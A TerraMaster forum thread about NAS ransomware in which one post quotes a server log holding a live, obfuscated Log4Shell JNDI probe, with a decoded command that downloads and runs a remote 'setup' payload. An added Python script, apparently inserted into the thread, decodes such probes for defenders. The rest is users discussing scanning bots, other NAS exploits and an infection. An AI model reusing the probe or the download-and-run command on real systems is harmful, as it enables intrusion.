Urgent Notification about TNAS being Attacked by Ransomware

LaMosca
Posts: 0
Joined: 23 Jan 2022, 11:23

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by LaMosca »

REBELinBLUE wrote:
>

People should not try. The question is, if it is burnable, what happens afterwards?

Will they attack? It is as if I try to force the door of your house to see if a thief can enter.

But look at this logo here.

*********************
OTHERS. MORE ATTACKS
*********************

******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Hos Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Sistema Operativo Desconocido
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************

HTTP Referer: Base64
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit

IP Address: ISP Digital Ocean, LLC = 165.232.155.141


IP Address: ISP Digital Ocean, LLC = 137.184.40.48

The question is: are big companies dedicated to making attacks on the servers, looking for I don't know what?

This is weird.
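A defender's way to read a log entry like the one above is to undo the `${env:NaN:-x}` lookup trick, recover the literal `jndi:ldap://` callback, and decode the Base64 segment so the staged command can be blocked and reported. The following script is an added example and is not code from the forum or from TerraMaster: it is written in Python, the probe string is the User-Agent value quoted in the post above, the other two User-Agent values are constructed benign samples, and it assumes (as a labelled assumption) that the environment variable named in each lookup is unset, so Log4j would have taken the default branch. It also handles the `${lower:x}`/`${upper:x}` lookups, which the post does not show but which work the same way.

```python
import base64
import binascii
import re

# Constructed sample input. The second value is the User-Agent string quoted in the
# post above; the first and third are ordinary, benign User-Agent strings added here
# purely for contrast.
SAMPLE_VALUES = [
    "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//137.184.40.48:1389/TomcatBypass/Command/Base64/"
    "d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYv"
    "c2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')",
    "curl/7.74.0",
]

# Log4j resolves "${lookup:name:-default}" to "default" when the lookup yields nothing,
# and "${lower:X}" / "${upper:X}" to case-changed X. Probes use these to split the
# literal "jndi:ldap" so that a naive substring match on the raw log line misses it.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)


def normalize_lookups(value, max_rounds=20):
    """Collapse nested lookups from the inside out and return the de-obfuscated string.

    Assumption: the variable named in each "${...:-default}" lookup is unset, so the
    default text is what Log4j would have substituted. Lookups that name no default
    are left untouched rather than guessed.
    """
    for _ in range(max_rounds):
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        if new == value:
            break
        value = new
    return value


# After normalization the callback is a plain "${jndi:<scheme>://host:port/...}".
JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http):/*([^/}\s]+)", re.IGNORECASE)
B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def analyze_value(value):
    """Return None for a clean value, or a dict describing the probe for triage."""
    norm = normalize_lookups(value)
    match = JNDI.search(norm)
    if match is None:
        return None
    finding = {
        "scheme": match.group(1).lower(),
        "callback": match.group(2),  # host:port the vulnerable app would be told to contact
        "obfuscated": norm != value,
        "normalized": norm,
        "decoded_command": None,
    }
    b64 = B64_SEGMENT.search(norm)
    if b64:
        try:
            raw = base64.b64decode(b64.group(1), validate=True)
            finding["decoded_command"] = raw.decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            finding["decoded_command"] = None  # malformed payload; keep the raw line for review
    return finding


def scan_values(values):
    """Run analyze_value over a list of header values; return (value, finding) pairs."""
    findings = []
    for value in values:
        finding = analyze_value(value)
        if finding is not None:
            findings.append((value, finding))
    return findings


if __name__ == "__main__":
    for value, finding in scan_values(SAMPLE_VALUES):
        print("probe via", finding["scheme"], "callback", finding["callback"])
        print("  normalized:", finding["normalized"])
        print("  staged command:", finding["decoded_command"])
```

The two addresses the script surfaces (the 137.184.40.48 LDAP callback and the 158.101.118.236 download host inside the decoded command) are exactly the indicators to block at the firewall and to include in an abuse report to the hosting provider, which is what the later replies in this thread recommend.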
V8Triker
Posts: 82
Joined: 26 Feb 2021, 19:18
Great Britain

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by V8Triker »

LaMosca wrote:

> IP Address: ISP Digital Ocean, LLC = 165.232.155.141
>
>
> IP Address: ISP Digital Ocean, LLC = 137.184.40.48
>
> The question is. Big companies are dedicated to making attacks? on the servers
> looking for I don't know what?
>
> this is weird.



Not so weird.
DigitalOcean provides rentable cloud servers, so it is someone who hosts a server on DigitalOcean that is attacking you.
I host a server on DigitalOcean, though just for hosting a website.
Report it to DigitalOcean and I am sure the client will have their server removed.

DigitalOcean (referral)- https://m.do.co/c/968520215356
REBELinBLUE
Posts: 29
Joined: 05 Dec 2021, 06:37

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by REBELinBLUE »

LaMosca wrote:
> REBELinBLUE wrote:
> >
>
> people should not try. The question is. if it is burnable what happens afterwards?
>
> will they attack? It is as if I try to force the door of your house to see if a thief
> can enter.

I honestly have no idea what you are saying...

As I said, the log shows someone trying a log4j exploit, which doesn't impact the TNAS. Any server connected to the public Internet will show things like this, people looking for wp-admin, various .NET exploits etc.; it doesn't mean they are exploitable, it means someone was looking to see if they were.
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

LaMosca wrote:
>

It's often not someone trying to hack your network, it's a "bot". These bots crawl the web probing ports looking for vulnerabilities, and some of these aren't bad actors; they're reputable companies looking to discover how many devices have unpatched vulnerabilities. For example, my Intrusion Protection System (IPS) reports this address so often that I asked them to remove my WAN IP from the ones they scan. (Their IP is 146.88.240.4 and you can see I am not alone in noticing this: https://www.abuseipdb.com/check/146.88.240.4.) The company is actually https://www.netscout.com

Even hackers don't often pick an IP at random and then try to hack it (well, unless you're a bank, the NSA, CIA etc.); they send a bot out to find any IPs which might be vulnerable and then use scripts to try to run exploits. This probably happened with the Terramaster and Qlocker attacks; it wasn't someone sat at a PC encrypting your files, it was just a script kiddie :)

As REBELinBLUE said, in your case it looks to be a bot looking for possible unpatched Log4J https://www.ncsc.gov.uk/information/log ... ds-to-know

More on Bots here https://www.hindawi.com/journals/scn/2017/5960307/
REBELinBLUE
Posts: 29
Joined: 05 Dec 2021, 06:37

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by REBELinBLUE »

Fair point, hadn't thought about it possibly just being a reputable organisation "just looking" as it were

https://www.abuseipdb.com/check/158.101.118.236
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

It seems those of us who are QNAP users have discovered another new Ransomware exploit in the last 24 hours, called "Deadbolt" https://forum.qnap.com/viewtopic.php?f= ... 7&start=15 (Thanks to my Firewall, so far I have not been attacked successfully yet!).

Be careful, people.
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

And more on Deadbolt (QNAP exploit for now). But hopefully one that TM are aware of and are ensuring it's not an exploit on TM devices https://www.reddit.com/r/qnap/comments/ ... nst_qnaps/
crisisacting
Posts: 258
Joined: 20 Jan 2022, 16:42

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by crisisacting »

There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/

As this affects most Linux distributions, openWRT is likely impacted as well.
TMroy
TerraMaster Team
Posts: 2578
Joined: 10 Mar 2020, 14:04
China

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by TMroy »

crisisacting wrote: 27 Jan 2022, 03:26
> There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/
>
> As this affects most Linux distributions, openWRT is likely impacted as well.

pkexec has not been used in TOS.

To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
peter.horsley
Posts: 3
Joined: 22 Feb 2021, 08:44

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by peter.horsley »

Short version: I see the word "ransomwar" (no e) in the HDMI console of a fresh install of TOS, downloaded from the official website. I took a photo of it which you can see via the link below. Can anyone explain this?

https://www.dropbox.com/s/vp31acfsneabs ... r.jpg?dl=0

Long version:
I noticed there was kinsing miner evidence on my NAS, and then started seeing files getting created including a readme.txt stating "All files are gone" with my email address, so it looks like a ransomware attack was in progress. I was shocked to find out about UPNP default settings that mean the NAS is accessible to the public internet. I have now disabled UPNP on my router. Then I took out all HDDs, put them in another computer and deleted all partitions. Then I tried to boot TNAS again but it failed to get an IP address. So I plugged in HDMI and noticed it was stuck trying to boot off the internal USB. So I found the instructions on how to re-image the USB drive and, after several unsuccessful attempts, I found the dropbox link to the bzImage archive which did work (after changing grub-install to grub2-install in make_install). Once booted, I went to initialize, inserted HDDs, but it failed to install the latest TOS image 4.2.28 at 55%. I tried the 2nd latest image 4.1.27 and it succeeded. All this time I had the HDMI plugged in to monitor progress. I noticed the word "ransomwar" appear as shown in the above photo on boot of 4.1.27, which is highly concerning considering this is a freshly imaged USB and freshly initialized TOS downloaded today with blank HDDs inserted. After upgrading to 4.2.28, I don't see that message on boot in the console anymore. It makes me wonder whether the official 4.1.27 contains ransomware!!

Can support please explain what is shown in the photo?